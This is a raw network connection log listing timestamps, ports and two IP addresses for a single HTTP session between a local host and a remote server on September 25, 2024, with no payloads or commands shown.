Sep 25, 2024 16:03:53.497558117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497570038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497581959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497594118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497606993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497620106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497642994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.497689009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.497796059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.575906038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576025009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576036930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576049089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576143980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576143980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576174974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576191902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576203108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576215029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576222897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576226950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576308012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576328993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576386929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576483965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576494932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576507092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576541901 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576637030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576647997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576658964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576693058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576693058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576792002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576805115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576816082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576828003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576839924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.576875925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.576875925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.586044073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.586143970 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.586214066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.640127897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652257919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652312994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652334929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652348042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652359962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652373075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652384996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652406931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652416945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652431011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652482986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652482986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652595997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652667999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652688980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652702093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652713060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652726889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652733088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652766943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652776957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652801037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652801037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652884007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652896881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652929068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.652965069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652965069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.652997017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.653042078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.653052092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.653660059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.731930971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.731950045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.731962919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732058048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732180119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732285023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732357025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732369900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732379913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732393026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732405901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732434988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732434988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732511044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732557058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732657909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732671022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732682943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732695103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732733011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732733011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.732798100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732966900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732979059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.732989073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733001947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733011961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733025074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733031034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.733031034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.733249903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.733253002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733264923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.733319044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.780719995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.782216072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.782238960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.782250881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.782263041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.782351971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.782576084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.808520079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808564901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808577061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808588982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808621883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808633089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808645010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808645010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.808645010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.808684111 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.808897018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808962107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808973074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.808986902 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.808990002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809001923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809072018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.809072018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.809079885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809091091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809103012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809189081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.809446096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809535027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809545040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809556961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.809582949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809593916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809606075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.809631109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.809631109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.818788052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.818857908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.818856955 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.859401941 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.859437943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.859457016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.859472036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.859523058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.869854927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.869889975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:53.869956017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:53.921448946 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.641931057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.641956091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.641963005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.641993999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642004967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642018080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642030001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642041922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642055035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642055035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642067909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642121077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642127991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642139912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642153025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642189026 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642302990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642359972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642371893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642371893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642379999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642390013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642422915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642435074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642436028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642447948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642467022 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642608881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642621040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642633915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.642640114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.642673016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720246077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720269918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720283985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720298052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720313072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720325947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720324993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720339060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720350981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720369101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720381021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720390081 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720423937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720458984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720504045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720515013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720547915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720565081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720577002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720588923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720612049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720623016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720624924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720635891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720649004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720654964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720673084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720719099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720731974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720742941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.720755100 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720773935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.720931053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721061945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721071959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721082926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721095085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721100092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.721107006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.721117973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.721153021 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798343897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798365116 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798386097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798393011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798398018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798403978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798415899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798423052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798437119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798537016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798542976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798548937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798562050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798584938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798599958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798749924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798760891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798774004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798794031 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798888922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798899889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798932076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.798943996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798954010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.798976898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.799000025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799010992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799066067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.799123049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799166918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799170971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.799177885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799201012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799211025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799212933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.799223900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799237013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.799252033 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.799272060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.876405954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876426935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876451969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876472950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876485109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876497030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876497030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.876507998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876522064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876533031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876548052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876563072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.876590014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.876622915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876633883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876645088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876682043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.876924038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876940966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.876952887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877007008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877018929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877029896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.877031088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877060890 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.877152920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877182961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877190113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.877194881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877228975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.877487898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877500057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877515078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.877532959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.921190977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954355955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954407930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954421043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954433918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954447031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954459906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954472065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954524040 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954713106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954725027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954741955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954751015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954762936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954772949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954773903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954783916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954796076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954804897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954807997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.954834938 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.954993963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955035925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.955096960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955106974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:55.955138922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:55.955156088 CEST	80	49715	172.94.3.25	192.168.2.6
